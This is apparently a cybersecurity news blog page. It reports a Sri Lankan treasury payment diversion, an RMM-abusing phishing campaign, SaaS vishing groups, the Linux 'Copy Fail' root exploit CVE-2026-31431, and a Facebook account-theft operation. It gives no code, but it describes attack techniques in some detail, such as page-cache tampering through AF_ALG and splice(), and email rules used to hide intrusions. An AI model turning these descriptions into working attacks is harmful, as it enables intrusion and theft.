Sri Lanka is trying to recover $2.5 million after a cyberattack on the Finance Ministry’s payment system redirected funds away from their intended recipient, exposing fresh weaknesses in the country’s public financial controls. Officials say the breach involved email manipulation, and the issue surfaced after opposition lawmakers alleged that treasury money had landed in a hacker’s account instead of reaching the correct creditor. The incident has prompted a high-level probe, with authorities treating it as both a financial loss and a serious security breach. 

According to finance ministry secretary Harshana Suriyapperuma, cybercriminals were first detected trying to enter the External Resources Department’s system in January 2026, and the ministry took steps with overseas partners to stop further damage. He said the earlier attempt was contained, but the later payment breach still led to losses that are now under review. The stolen amount formed part of a larger $22.9 million payment, with $2.5 million reportedly disbursed between December 2025 and January 31, 2026. 

The incident has drawn wider attention because it involves government debt repayment funds and an apparent failure in payment verification. Australia’s high commissioner in Sri Lanka said Canberra was aware of irregularities in payments owed to it, and Australian officials are assisting the investigation. That international angle has made the breach more sensitive, since the diverted funds were tied to a sovereign obligation rather than a routine domestic transaction. 

A high-powered committee has been formed to investigate the hacking incident and identify how the payment was rerouted. Opposition lawyers have also asked Parliament to examine the matter, arguing that public finances fall under legislative oversight. The issue has been raised before the Committee on Public Accounts, adding political pressure on the government to explain how the breach happened and whether more funds may have been exposed. 

The episode is a damaging reminder that cyberattacks can hit not just banks and companies but also state payment systems handling international debt obligations. For Sri Lanka, which is still recovering from its severe economic crisis and debt default, even a single diverted payment can deepen concerns about administrative safeguards and digital resilience. The investigation will likely focus on email security, approval controls, and how quickly suspicious payment changes were detected.
Read more »
Threat Intelligence
Cyber Attacks Endpoint security Initial Access Broker Phishing Attack Ransomware Precursor RMM Exploitation ScreenConnect Threat SimpleHelp Abuse Threat Intelligence

Over 80 Organisations Impacted by Phishing Leveraging SimpleHelp and ScreenConnect

 


Researchers have identified a systematic intrusion operation that is utilizing remote management utilities, and recent findings reinforce this shift in phishing campaigns, which have evolved from opportunistic scams to structured intrusion operations. 

Researchers have identified an ongoing campaign that has compromised more than 80 organizations across multiple industries since April 2025, with a significant concentration in the United States. In the operation, malicious software is deliberately used, allowing attackers to establish covert and persistent access under the guise of legitimate administrative activity through the deliberate use of vendor-signed Remote Monitoring and Management software. 

Through the deployment of modified versions of SimpleHelp and ScreenConnect, the threat actors have effectively bypassed conventional security controls, relying on trusted installation workflows initiated by innocent individuals. 

The activity aligns with previously observed clusters tracked by independent security teams, but this latest analysis provides enhanced insight into the campaign's indicators, behavior, and operational sophistication, highlighting a coordinated effort that is extending its reach in a coordinated fashion. 

Securonix analysis, which tracks the VENOMOUS#HELPER activity cluster, shows that the operation has maintained continuous momentum since April 2025, extending its reach beyond the U.S. into Western Europe and Latin America. 

The campaign is distinguished by its calculated use of two Remote Monitoring and Management platforms, SimpleHelp and ScreenConnect both of which are legitimately signed and widely utilized by enterprises. Rather than deploying conventional malware payloads, threat actors employ these trusted tools to embed persistent access within victim systems, effectively blending malicious activity with routine administrative functions in order to achieve effective results. 

By using two RMM solutions in parallel, there is built-in redundancy, which ensures access continues regardless of whether a channel is detected and removed. Although no formal attribution has been established, Securonix concludes that these operational patterns are consistent with financial motivated Initial Access Brokers and early-stage ransomware campaigns, particularly those targeting organizations in economically significant regions. 

The activity cluster, known as VENOMOUS#HELPER, continues to demonstrate significant overlap with threat patterns previously documented by Red Canary and Sophos, whose designation for it is STAC6405, based on these findings. Although its operational characteristics are consistent with financial-driven initial access brokerage or early-stage ransomware enablement, its attribution remains unclear. 

A researcher involved in the investigation indicates that by deploying SimpleHelp and ScreenConnect in customized configurations, the campaign is able to circumvent conventional defensive mechanisms by embedding itself within legitimate administrative workflows, which allows attackers to bypass conventional defensive mechanisms. 

Additionally, a deliberate dual-channel access strategy is used to strengthen the resilience and continuity of control, even if one access vector is identified and neutralised. The intrusion sequence is initiated through a carefully crafted phishing email impersonating the U.S. Social Security Administration, asking recipients to verify their email address and download a purported statement via an embedded link. 

In an attempt to bypass email filtering systems, the link does not redirect victims to an overtly suspicious infrastructure; instead, it redirects victims to a legitimate Mexican business domain that is compromised, but otherwise legitimate. A disguised executable masquerading as an official document is retrieved from a secondary attacker-controlled domain in order to stage the subsequent payload delivery. 

A compromised cPanel account on a legitimate hosting environment was used to create the infrastructure for this purpose. When the JWrapper-packaged Windows binary is executed, it initiates a sequence aimed at ensuring persistence and stability of the application. Windows services are configured to survive Safe Mode conditions and employ a self-healing watchdog mechanism for automatic restoration of execution if terminated. 

Parallel to periodic reconnaissance, the implant queries the root/SecurityCenter2 WMI namespace to enumerate installed security solutions periodically. It is also configured to poll users on a periodic basis in order to monitor user activity. A combination of these behaviors illustrates a high level of technical maturity that is intended to maintain low-visibility access within compromised environments over long periods of time. 

STAC6405 infection chain reveals a methodical, multi-stage delivery framework designed to delay suspicion until execution has been established firmly on the victim computer. In the first stage, the intrusion begins with phishing emails impersonating the U.S. Social Security Administration, informing recipients of the recently released statement and requesting immediate action. 

In place of utilizing attacker-registered infrastructure, the embedded link redirects to a compromised but legitimate Mexican domain, a method designed to circumvent Secure Email Gateway filtering by utilizing the inherent trust that is associated with established .com.mx domains. Users are required to confirm their email addresses on the landing page to proceed with the SSA verification interface. This intermediate harvesting step not only validates the target’s authenticity but also provides attackers with an established communication channel to target them in the future. 

In response to this interaction, victims are seamlessly redirected to an attacker-controlled secondary host where a payload is staged for download. Based on the delivery URL structure, it appears to have been a compromise of a single cPanel account in a shared hosting environment, as indicated by the tilde-prefixed directory names. This report emphasizes the fact that the primary website infrastructure remains intact, with malicious content confined to a subdirectory deliberately named to maintain thematic consistency with the lure involving Social Security. 

To conceal the binary's true nature, the final payload, which is distributed as a Windows executable, takes advantage of default operating system behavior. File extensions are hidden in Explorer, which makes the binary appear legitimate, while JWrapper packaging incorporates customised visual elements such as iconography and splash screens to reinforce the authenticity of the binary. 

At each stage of execution, STAC6405 prioritizes credibility, evasion, and user manipulation in an effort to convey a carefully orchestrated delivery mechanism. The foundation of STAC6405's effectiveness lies in the use of calculated methods to exploit implicit trust in remote administration programs.

In addition, both SimpleHelp and ScreenConnect binaries are signed with Authenticode certificates, issued by globally recognized certificate authorities, which enables them to pass signature-based security checks seamlessly. These binaries are not flagged by traditional antivirus controls, Windows SmartScreen and Mark-of-the-Web protections are effectively neutralized, and endpoint detection mechanisms are forced to make use of behavioral telemetry, such as process lineage, rather than static indicators, such as file hashes, to detect endpoints. 

A network perspective indicates that outbound traffic is blending with legitimate activity by communicating with infrastructure that appears consistent with commercial software usage rather than overt command-and-control mechanisms. A cracked distribution of SimpleHelp, version 5.0.1 compiled in July 2017, aligns with the instance deployed in this campaign, which was widely circulated in underground forums between 2016 and 2019. 

Due to its expiring certificate window and lack of license validation mechanisms, it is highly likely that the tool has been deployed without financial traceability or vendor oversight by threat actors. The foundation supports a dual-RMM architecture that is purposefully engineered to fulfill distinct operational roles while bolstering the persistence of the other tools. 

The SimpleHelp application primarily utilizes UDP and HTTP communications over port 5555 to connect directly to an IP-based command endpoint for automated surveillance, scripted execution, and low visibility control. By contrast, ScreenConnect facilitates interactive, hands-on keyboard access over TCP port 8041 by using a proprietary relay protocol whose domain is controlled by an attacker. 

By separating these channels, not only is operational flexibility enhanced, but a resilient environment is created which ensures that disruption of one channel does not lead to the complete loss of access to the attacker. 

Remote administration capabilities are available through the SimpleHelp deployment, which includes full desktop control through VNC-based interaction, command execution by a virtual terminal bridge, silent session establishment without notification of the user, and privilege escalation mechanisms that bypass conventional user account control prompts. 

A number of additional features further reinforce persistence, including bidirectional file transfer, automated firewall rule modification, remote scripting, and self-healing service restoration. Cross-platform binaries are also indicative of adaptability, as they indicate that the same toolkit can be used on macOS and Linux systems as well, thereby expanding the potential attack surface and maintaining the same operational footprint across the same platforms. 

VENOMOUS#HELPER illustrates a measured shift in adversary tradecraft where stealth, legitimacy, and operational resilience are given greater priority than traditional malware deployments. By integrating themselves within trusted administrative ecosystems and utilizing a dual-RMM framework, operators dissolve the distinction between benign and malicious activity, creating a complex detection and response process. 

There was an intentional effort to circumvent conventional controls at every stage of the intrusion life cycle by means of the campaign's structured delivery chain, abuse of compromised infrastructure, and use of signed binaries. Therefore, defensive strategies based solely on signature detection or known indicators fail to be sufficient in this context.

Organisations, therefore, must reevaluate their security posture toward behavioural analysis, tight control over remote access tools, and continuous monitoring of the relationships between processes and the use of privileges. As threat actors refine these techniques, the campaign is a clear indicator that trusted software is becoming increasingly effective for executing untrusted intent in the cyberspace.
Read more »
Vishing
Cloud systems Credentials Stolen Cyber Attacks Extortion Fake Login phishing saaS Vishing

Hackers Target Cloud Apps Using Phone Scams and Login Tricks



Cybersecurity researchers have identified two threat groups that are executing fast-moving attacks almost entirely within software-as-a-service environments, allowing them to operate with very little visible trace of intrusion.

The groups, tracked as Cordial Spider and Snarky Spider, are also known by multiple alternate identifiers across different security vendors. Investigations show that both groups are involved in high-speed data theft followed by extortion attempts, and their methods show a strong overlap in how operations are carried out. Analysts assess that these groups have been active since at least October 2025. One of them is believed to be composed of native English speakers and is linked to a cybercrime network widely referred to as “The Com.”

According to findings from CrowdStrike, these attackers primarily rely on voice phishing, also known as vishing, to initiate their intrusions. In these cases, individuals are contacted and guided toward fraudulent login pages that are designed to imitate single sign-on systems. These pages act as adversary-in-the-middle setups, meaning they intercept and capture authentication data, including login credentials and session details, as the victim enters them. Once this information is obtained, attackers immediately use it to access SaaS applications that are connected through single sign-on integrations.

Researchers explain that the attackers deliberately operate within trusted SaaS platforms to avoid raising suspicion. Because their activity takes place inside legitimate services already used by organizations, their presence generates fewer detectable signals. This allows them to move quickly from initial compromise to data access. The combination of speed, targeted execution, and reliance on SaaS-only environments makes it harder for defenders to monitor and respond effectively.

Earlier research published in January 2026 by Mandiant revealed that these attack patterns represent a continuation of tactics seen in extortion-focused campaigns linked to the ShinyHunters group. These operations involve impersonating IT staff during phone calls to build trust with victims, then directing them to phishing pages in order to collect both login credentials and multi-factor authentication codes.

More recent analysis from Palo Alto Networks Unit 42 and the Retail & Hospitality ISAC indicates, with moderate confidence, that one of the identified clusters is associated with The Com network. These attacks rely heavily on living-off-the-land techniques, where attackers use legitimate system tools instead of introducing malware. They also make use of residential proxy networks to mask their real geographic location and to evade basic IP-based security filtering systems.

Since February 2026, activity linked to one of these clusters has been directed toward organizations in the retail and hospitality sectors. The attackers combine vishing calls, often impersonating IT help desk personnel, with phishing websites designed to capture employee credentials.

Once access is established, the attackers take steps to maintain long-term control. They register a new device within the compromised account to ensure continued access, and in many cases remove previously registered devices. After doing so, they modify email settings by creating inbox rules that automatically delete notifications related to new device logins or suspicious activity, preventing the legitimate user from being alerted.

Following initial access, the attackers shift their focus toward accounts with higher privileges. They collect internal information, such as employee directories, to identify individuals with elevated access and then use further social engineering techniques to compromise those accounts as well. With increased privileges, they move across SaaS platforms including Google Workspace, HubSpot, Microsoft SharePoint, and Salesforce, searching for sensitive documents and business-critical data. Any valuable information is then exfiltrated to infrastructure controlled by the attackers.

Researchers note that in many observed cases, the stolen credentials provide access to the organization’s identity provider, which acts as a central authentication system. This creates a single entry point into multiple SaaS applications. By exploiting the trust relationships between the identity provider and connected services, attackers are able to move across the organization’s cloud ecosystem without needing to compromise each application separately. This allows them to access multiple systems using a single authenticated session.


Read more »
Root Access Exploit
CISA KEV catalog Container Security Risk CVE-2026-31431 Cyber Attacks Kernel Exploit Detection Linux Kernel Vulnerability Linux Security Patch Privilege Escalation Root Access Exploit

CISA Highlights CVE-2026-31431 as an Active Linux Root Exploitation Risk


 

Several vulnerabilities in the Linux kernel have been recently disclosed that have attracted heightened scrutiny from the cybersecurity community, following evidence that they can be exploited to obtain full root-level control across a wide range of systems consistently. This vulnerability, formally referred to as “Copy Fail,” affects kernel versions spanning nearly a decade, dramatically expanding its attack surface and posing a significant threat to millions of deployments.

It is tracked as CVE-2026-31431. Several security researchers emphasize that this issue is not only significant when it comes to privilege escalation, but also stands out for its operational simplicity, cross-environment portability, and high exploitation success rate factors, which all contribute to its elevated threat profile and explain why it has been classified as an actively exploited vulnerability. 

Upon reviewing these findings, the Cybersecurity and Infrastructure Security Agency (CISA) has formally escalated the issue by adding the flaw to its Known Exploited Vulnerabilities (KEV) catalogue, which indicates confirmed instances of exploitation across multiple Linux distributions in the wild. 

The weakness, rated CVE-2026-31431, has a CVSS score of 7.8, and is considered to be a local privilege escalation vulnerability (LPE), which permits an unprivileged user with local access to elevate privileges to root privileges. However, its long-lasting undetected status, combined with its reliable exploitation pathway, makes it an operational risk even greater despite its moderate scoring. 

Under the designation “Copy Fail,” security researchers at Theori and Xint first identified and analyzed this issue. The issue arises from the incorrect transfer of resources between security contexts within Linux kernels, which can be exploited to bypass standard privilege boundaries in Linux. 

Several kernel patches, including versions 6.18.22, 6.19.12, and 7.0, have been released in response to this vulnerability, which has been actively exploited. Federal guidance urges organisations to prioritize updating based on the active exploitation status of the vulnerability. Additionally, its unusually low barrier to exploitation and wide ecosystem impact reinforce the urgency surrounding the flaw. 

According to researchers, an exploit can be executed with as little as 732 bytes of code, which significantly reduces the threshold for abuse and extends its reach across virtually all major Linux distributions since 2017. 

Unprivileged local users are able to manipulate the kernel's in-memory page cache of readable files, including setuid binaries, at the core of the vulnerability. By doing so, executables may be modified at runtime without altering files on disk. Injecting malicious code into trusted binaries such as /usr/bin/su results in root-level permissions for execution. This technique creates a stealthy pathway to privilege escalation. 

The security analysts at Wiz have stated that this in-memory tampering fundamentally undermines traditional integrity assumptions, since the page cache serves as the live execution layer for binaries. Furthermore, this risk is compounded when deploying large-scale Linux-based applications in modern cloud or containerised infrastructures. 

According to Kaspersky's analysis, environments that leverage container technologies, such as Docker, LXC, and Kubernetes, may be particularly vulnerable to threats. By default, container processes may interact with the AF_ALG subsystem if the algif_aead module is present in the host kernel, thus expanding the attack surface and enhancing privilege escalation across boundaries. 

In a technical sense, the vulnerability originates from a logic flaw within the Linux kernel's cryptographic pipeline, specifically the authenticated encryption template ("authenc"), where incomplete handling allows memory interactions that were not intended. 

Essentially, the vulnerability allows a local, unprivileged user to trigger a controlled four-byte write primitive into any readable file's page cache—a capability which appears to be constrained, but which has severe security implications when applied to executable memory. 

A key component of the exploit chain is the AF_ALG interface, which exposes kernel cryptographic operations to user space, as well as the splice() system call, which is used to redirect data flows away from conventional buffers and into the GPU page cache. 

By manipulating the in-memory representation of executables, attackers can subtly modify their execution behaviour without changing files on disk; when these modifications target setuid-root executables, it is trivial to escalate privileges to the full set of privileges. An analysis of the root cause of the issue has revealed that this vulnerability was caused by a 2017 optimization introduced in the Linux kernel version 4.14 that enabled in-place buffer reuse to improve performance but weakened memory isolation guarantees by accident, creating the conditions for an exploit. 

Several distributions have been validated empirically by researchers, including Ubuntu 24.04 LTS, Amazon Linux 2023, Red Hat Enterprise Linux 10.1, SUSE Linux Enterprise 16, and Debian, all of which have demonstrated near-perfect reliability in a compact Python proof-of-concept. Since this flaw affects virtually all distributed operating systems released since 2017, it has drawn comparisons with previous high-profile flaws, including Dirty Pipe (CVE-2022-0847). 

However, Copy Fail is more portable across kernel versions, more reliable, and is simpler to exploit, as it does not require specific offsets or narrowly scoped configurations to operate. To resolve the issue, kernel maintainers reverted the underlying optimization and reintroduced safer buffer handling mechanisms as part of versions 6.18.22, 6.19.12, and 7.0 of the kernel. 

Despite the fact that major distributions have begun to deploy patched kernels, inconsistencies in advisory publication have caused friction in coordinated response efforts, resulting in security researcher Will Dormann noting that some platforms have issued updates that do not consistently mention CVE-2026-31431, potentially stalling remediation and risk awareness at an enterprise level. 

An additional technical analysis of the flaw has revealed a practical exploitation pathway, illustrating how attackers can operationalise the vulnerability systematically in real-world environments. An attacker typically begins the attack sequence by identifying a Linux host or container that runs on a vulnerable kernel version, followed by the preparation of an attack trigger based on Python tailored specifically for the target machine. 

Upon initiating the exploit, it can be executed either as a standard user on the host system or within a compromised container without elevated privileges utilizing a low-privilege context. By utilizing the underlying flaw, the exploit can overwrite the kernel page cache precisely by four bytes, corrupting sensitive data structures that are managed by the kernel and enabling privilege escalation. Ultimately, this allows the attacker to obtain unrestricted root access by elevating their process to UID 0.

As a result of the active threat landscape, Federal Civilian Executive Branch (FCEB) agencies have been instructed to resolve the vulnerability by May 15, 2026, in accordance with patches released by Linux distributions affected by this vulnerability. 

In the case that immediate patching is not feasible, interim mitigation strategies, including disabling vulnerabilities, segmenting networks, and tightening access controls, have been recommended as a means of reducing exposure and containing potential compromise paths. 

As a result of the active exploitation status of CVE-2026-31431, its extensive reach across the Linux ecosystem, and its relative ease of weaponisation, it serves as a critical reminder of the risks that are inherent to longstanding kernel-level design decisions. As a result of the convergence of high reliability, minimal exploit complexity, and broad distribution exposures, organizations are under increasing pressure to verify their patch postures and expedite remediation. 

As a precautionary measure, security teams should prioritize kernel updates, closely monitor privilege escalation activity, and reassess controls around multi-tenant and containerised environments in which attack surfaces may be heightened. 

Threat actors will continue to exploit low-friction exploitation paths for exploitation, which will require timely mitigation and disciplined system hardening to ensure operational integrity and limit the impact of these kernel vulnerabilities.
Read more »
Vietnam phishing campaign
AccountDumpling attack Cyber Attacks Facebook account hacking Google AppSheet phishing Vietnam phishing campaign

Vietnam-Linked “AccountDumpling” Campaign Exploits Google AppSheet to Hijack Thousands of Facebook Accounts

 


A newly uncovered cybercrime campaign linked to Vietnamese actors has been leveraging Google AppSheet as a phishing relay to send deceptive emails aimed at compromising Facebook accounts.

The operation, dubbed “AccountDumpling” by Guardio, revolves around stealing Facebook accounts and reselling them through illicit online marketplaces controlled by the attackers. Researchers estimate that nearly 30,000 accounts have been breached in this coordinated campaign.

"What we found wasn't a single phishing kit," security researcher Shaked Chen wrote in a report shared with The Hacker News. "It was a living operation with real-time operator panels, advanced evasion, continuous evolution and a criminal-commercial loop that quietly feeds on the same accounts it helps steal back."

This discovery highlights a broader trend of Vietnamese threat groups using increasingly sophisticated tactics to gain unauthorized access to Facebook accounts, which are later sold in underground markets for profit.

The attack chain typically begins with phishing emails sent to Facebook Business users, falsely posing as messages from Meta Support. These emails warn recipients that their accounts risk permanent suspension unless they submit an appeal. Notably, the emails originate from a legitimate-looking Google AppSheet address ("noreply@appsheet.com
"), helping them evade spam detection systems.

Victims are then directed to fraudulent websites designed to capture login credentials. Similar tactics were previously reported by KnowBe4 in May 2025.

In recent weeks, attackers have diversified their lures to trigger “Meta-related panic.” These include fake alerts about account bans, copyright violations, verification requests, job offers, and suspicious login activity. Guardio identified four primary attack patterns:
  • Phishing pages hosted on Netlify that mimic Facebook Help Center interfaces, collecting sensitive details such as birth dates, phone numbers, and ID documents, which are then transmitted to attacker-controlled Telegram channels.
  • Fake “blue badge” verification scams directing users through Vercel-hosted pages disguised as security checks, eventually harvesting credentials, business data, and two-factor authentication (2FA) codes.
  • Malicious PDF files hosted on Google Drive, posing as verification instructions, tricking users into submitting passwords, 2FA codes, ID images, and browser screenshots. These PDFs were created using a free Canva account.
  • Fraudulent job offers impersonating well-known brands such as WhatsApp, Adobe, Pinterest, Apple, and Coca-Cola to build trust and lure victims into further interaction on malicious platforms.
Across the first three attack clusters alone, associated Telegram channels were found to store around 30,000 victim records. Affected users span multiple countries, including the U.S., Italy, Canada, the Philippines, India, Spain, Australia, the U.K., Brazil, and Mexico, with many losing access to their accounts entirely.

Investigators traced part of the operation back to a Vietnamese individual after analyzing metadata embedded in the phishing PDFs, which listed the name “PHẠM TÀI TÂN” as the author. Further open-source investigation uncovered a website linked to this identity offering digital marketing services.

In a February 2023 post on X, the site’s account stated it "specializes in providing digital marketing services, marketing resources, and consulting on effective digital marketing strategies."

"Taken together, they form a consistent picture of a large, Vietnamese-based, mega operation," Chen said. "This campaign is bigger than a single AppSheet abuse. It's a window into the dark market around stolen Facebook assets, where access, business identity, ad reputation, and even account recovery have all become tradable commodities. Another entry in the pattern we keep surfacing: trusted platforms repurposed as delivery, hosting, and monetization layers."
Read more »
Subscribe to: Posts (Atom)